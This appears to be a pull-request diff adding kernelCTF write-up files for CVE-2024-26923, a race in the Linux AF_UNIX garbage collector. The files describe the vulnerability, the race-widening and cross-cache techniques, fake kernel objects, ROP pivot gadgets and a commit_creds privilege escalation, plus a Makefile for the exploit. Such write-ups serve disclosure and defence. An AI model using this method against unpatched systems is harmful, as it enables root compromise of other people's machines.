Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
219 changes: 219 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-26923_lts_cos/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,219 @@
## Triggering the race condition

In this vulnerability we have two race windows.
The first one is in unix_stream_connect():

```
static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
int addr_len, int flags)
{
...
unix_peer(sk) = newsk;
[window 1 start]
unix_state_unlock(sk);
/* take ten and send info to listening sock */
spin_lock(&other->sk_receive_queue.lock);
[window 1 end]
__skb_queue_tail(&other->sk_receive_queue, skb);
spin_unlock(&other->sk_receive_queue.lock);
...
```

This function is triggered by executing connect on CPU 0. This CPU will do nothing else until the race conditions part of the exploit is over.

We have to use the other CPU available to perform 2 operations during this window:
1. Send the victim socket through this connecting socket.
2. Close the victim socket
3. Trigger garbage collection and run unix_gc() until the start of window 2.

If we start too early, our send will fail because the socket is not connected yet and the exploit will fail.

Second window is in the unix_gc function:
```
void unix_gc(void)
{
...
list_for_each_entry(u, &gc_candidates, link)
{
scan_children(&u->sk, dec_inflight, NULL);
}
[window 2 start]
/* Restore the references for children of all candidates,
* which have remaining references. Do this recursively, so
* only those remain, which form cyclic references.
*
* Use a "cursor" link, to make the list traversal safe, even
* though elements might be moved about.
*/
list_add(&cursor, &gc_candidates);
[window 2 end]
while (cursor.next != &gc_candidates) {
u = list_entry(cursor.next, struct unix_sock, link);
/* Move cursor to after the current position. */
list_move(&cursor, &u->link);
if (atomic_long_read(&u->inflight) > 0) {
list_move_tail(&u->link, &not_cycle_list);
__clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
scan_children(&u->sk, inc_inflight_move_tail, NULL);
}
}
list_del(&cursor);
```

For the vulnerability to be triggered two conditions have to be met:
1. The first scan_children() can not see the embryo in the receive queue of the server socket
2. The second scan_children() has to see the embryo.

This causes a decrement/increment mismatch and the resulting use-after-free.

In other words, window 2 has run inside the window 1 of unix_stream_connect().


To have a chance of aligning the two threads correctly we have to extend both race windows as much as possible.
To do that we use a well-known timerfd technique invented by Jann Horn.
The basic idea is to set hrtimer based timerfd to trigger a timer interrupt during our race window and attach a lot (as much as RLIMIT_NOFILE allows)
of epoll watches to this timerfd to make the time needed to handle the interrupt longer.
For more details see the original [blog post](https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html).

Here's the triggering sequence (we use 2 CPUs, CPU1 is executing child_send() thread):

| CPU 0 | CPU 1 |
| -------- | -------- |
| arms timer 1 to trigger after a delay | - |
| calls connect() on the client socket | - |
| unix_stream_connect() runs until the start of window 1 | - |
| timer 1 is triggered during window 1 | - |
| timer goes through all epoll notifications | sends victim socket through the client socket |
| ... | closes victim socket |
| ... | arms timer 2 to trigger after a delay |
| ... | closes another socket to trigger unix_gc() |
| ... | unix_gc() runs until the start of window 2 |
| ... | timer 2 is triggered during window 2 |
| timer 1 handler ends | timer goes through all epoll notifications |
| window 1 ends, embryo is added to the receive queue | ... |
| - | timer 2 handler ends, window 2 ends |
| - | second scan_children() executes inc_inflight_move_tail() on the victim socket |

## Exploiting the use-after-free

At this point our victim socket is inflight, linked in the gc_inflight_list and has a inflight reference value of 2.
Next step is to receive this socket and close it. This will cause its struct sock object to be freed, but it will stay referenced in the gc_inflight_list.
In case of unix sockets, struct sock is allocated from a separate kmalloc cached called 'UNIX'. On our target one slab takes a order 2 (size 0x4000) page and fits 15 objects.

To be able to exploit the use-after-free we have to cause the slab containing our victim objects to be discarded and returned to the page allocator.
This is done using standard cross-cache techniques:
1. Free all objects of the given slab
2. Create a lot of partial slabs to unfreeze the empty slab and get it discarded

However, in this case we need maximum reliability - winning the race is such a rare event that we can't afford to make mistakes in the later stages of the exploit.

Because of this we used the /proc/zoneinfo parsing technique to establish a known UNIX cache state before starting the exploit attempt.
This is done in the get_fresh_unix() function.
One problem that we have to solve is that when a unix socket an allocation is also made from sock_inode_cache, which uses slabs of the same size (0x4000) as the UNIX cache, causing issues with detecting a new UNIX slab.

To solve this we first allocate some netlinks objects, which do not have their own dedicated sock object cache, so the only order 2 page allocation comes from sock_inode_cache.
This allows us to get a fresh sock_inode_cache slab first and then proceed with unix socket allocations to get a fresh UNIX slab.

After the slab page is returned to the page allocator we can easily reallocate it using an xattr of size 0x4000 - xattrs larger than 0x2000 are allocated directly from the page allocator.

## Getting RIP control

At this point we have a struct sock object linked in the gc_inflight_list that we can fill with arbitrary data.
This list is used by unix_gc() and if we are able to craft a fake sock object convincing enough that unix_gc() will be able to traverse the gc_inflight_list and move sk_buff objects from our sock object to the 'hitlist' that will be passed to the skb_queue_purge().

unix_gc() uses list handling functions to move the victim object between lists multiple times and CONFIG_DEBUG_LIST is on, so our object has to have valid prev/next list pointers.
Also, properties such as sk_socket->file are accessed, meaning we have to also craft related objects (or at least their part) like struct socket, struct file, struct inode and finally sk_buff - this object will contain function pointer giving us RIP control and the ROP chain.

But first, we need a place with a known address to store all these objects.

### Crafting objects in kernel memory

The fake kernel objects were sprayed into the physical memory by creating a lot of large tmpfs xattrs and referenced by using a direct mapping address - more details about that can be found in the [novel techniques](novel-techniques.md) section.

The first fake socket to replace the victim object on the gc_inflight_list is prepared in prepare_sock() and has pointers to the ones prepared in prepare_more_socks(). These are actually allocated at the very beginning of the exploit - we can do it because their location in memory is known in advance.

### Triggering the sk_buff destructor to get RIP control

When an inflight socket is chosen to be released by the unix_gc() the sk_buff carrying it is removed from the sk_receive_queue and linked into the 'hitlist' and then skb_queue_purge() is called on that list:
```
static inline void __skb_queue_purge(struct sk_buff_head *list)
{
struct sk_buff *skb;
while ((skb = __skb_dequeue(list)) != NULL)
kfree_skb(skb);
}
```

If this is the last reference to a given skb, skb_release_head_state() is eventually called:
```
void skb_release_head_state(struct sk_buff *skb)
{
skb_dst_drop(skb);
if (skb->destructor) {
DEBUG_NET_WARN_ON_ONCE(in_hardirq());
skb->destructor(skb);
}
#if IS_ENABLED(CONFIG_NF_CONNTRACK)
nf_conntrack_put(skb_nfct(skb));
#endif
skb_ext_put(skb);
}
```

Because we control all the contents of the sk_buff object we can make sure the destructor will be called.

## Pivot to ROP

When the destructor is called, RDI contains a pointer to our fake sk_buff object.
First 16 bytes of this objects are used the the list head, so we can't start our ROP there.

Following chain of gadgets allows us to pivot to rdi+0x10 where our ROP chain starts:

```
mov r8,QWORD PTR [rdi+0xc8]
mov eax,0x1
test r8,r8
je 0xffffffff8218aac1
mov rsi,rdi
mov rcx,r14
mov rdi,rbp
mov rdx,r15
call 0xffffffff8242ca60 <__x86_indirect_thunk_r8>
```

This copies RDI to RSI

```
push rsi
jmp qword [rsi-0x70]
```

This pushes RSI to the stack. We can safely use -0x70 offset because our sk_buff is a part of a larger allocation

Finally:

```
pop rsp
pop rbp
pop rbx
ret
```

Two pops at the end move RSP after the list_head head of sk_buff

## Second pivot

There is not much space at the beginning of the sk_buff - next used field is at 0x38 offset, so we have space for only 3 gadgets, but this is enough to pivot to a larger space with a simple pop rsp ; ret

## Privilege escalation

The second stage of the ROP does the standard commit_creds(init_cred); switch_task_namespaces(pid, init_nsproxy); sequence and returns to the userspace.
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
### Storing objects under a known address in kernel memory

There's a surprisingly simple way to store almost unlimited amount of data at a known kernel address, which makes tricks like using cpu_entry_area obsolete.

All data stored in the memory is accessible in kernel mode via direct physical memory mapping.
Virtual address of an object is the start of the direct mapping (page_offset_base) plus an offset based on the PFN of the physical page.
Physical memory addresses of heap slabs or user memory are easily predicted - only kernel code/data sections are randomized.
Even if everything would be randomized, we could just spray most of the physical memory with our payload, defeating any such mitigation.

page_offset_base is randomized, but on systems with the PTI disabled we can use a side channel technique like prefetch to leak this address, same way we do with the start of the kernel code section.

There are many ways to store data in memory - I prefer using large xattrs on tmpfs.
The maximum size is of one xattr 0xffff bytes and allocations over 0x2000 are served directly from the page allocator.
84 changes: 84 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-26923_lts_cos/docs/vulnerability.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,84 @@
## Requirements to trigger the vulnerability

- Kernel configuration: CONFIG_UNIX
- User namespaces required: no

## Commit which introduced the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9

## Commit which fixed the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=47d8ac011fe1c9251070e1bd64cb10b48193ec51

## Affected kernel versions

Introduced in 3.0. Fixed in 6.1.87, 6.6.28 and other stable trees.

## Affected component, subsystem

net/unix

## Description

Garbage collector does not take into account the risk of embryo getting
enqueued during the garbage collection. If such embryo has a peer that
carries SCM_RIGHTS, two consecutive passes of scan_children() may see a
different set of children. Leading to an incorrectly elevated inflight
count, and then a dangling pointer within the gc_inflight_list.

sockets are AF_UNIX/SOCK_STREAM:
- S is an unconnected socket
- L is a listening in-flight socket bound to addr, not in fdtable
- V's fd will be passed via sendmsg(), gets inflight count bumped

```
connect(S, addr) sendmsg(S, [V]); close(V) __unix_gc()
---------------- ------------------------- -----------
NS = unix_create1()
skb1 = sock_wmalloc(NS)
L = unix_find_other(addr)
unix_state_lock(L)
unix_peer(S) = NS
// V count=1 inflight=0
NS = unix_peer(S)
skb2 = sock_alloc()
skb_queue_tail(NS, skb2[V])
// V became in-flight
// V count=2 inflight=1
close(V)
// V count=1 inflight=1
// GC candidate condition met
for u in gc_inflight_list:
if (total_refs == inflight_refs)
add u to gc_candidates
// gc_candidates={L, V}
for u in gc_candidates:
scan_children(u, dec_inflight)
// embryo (skb1) was not
// reachable from L yet, so V's
// inflight remains unchanged
__skb_queue_tail(L, skb1)
unix_state_unlock(L)
for u in gc_candidates:
if (u.inflight)
scan_children(u, inc_inflight_move_tail)
// V count=1 inflight=2 (!)
```
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
INCLUDES =
LIBS = -pthread -ldl
CFLAGS = -fomit-frame-pointer -static -fcf-protection=none

exploit: exploit.c kernelver_17800.147.54.h
gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)

prerequisites:
sudo apt-get install libkeyutils-dev
Binary file not shown.
Loading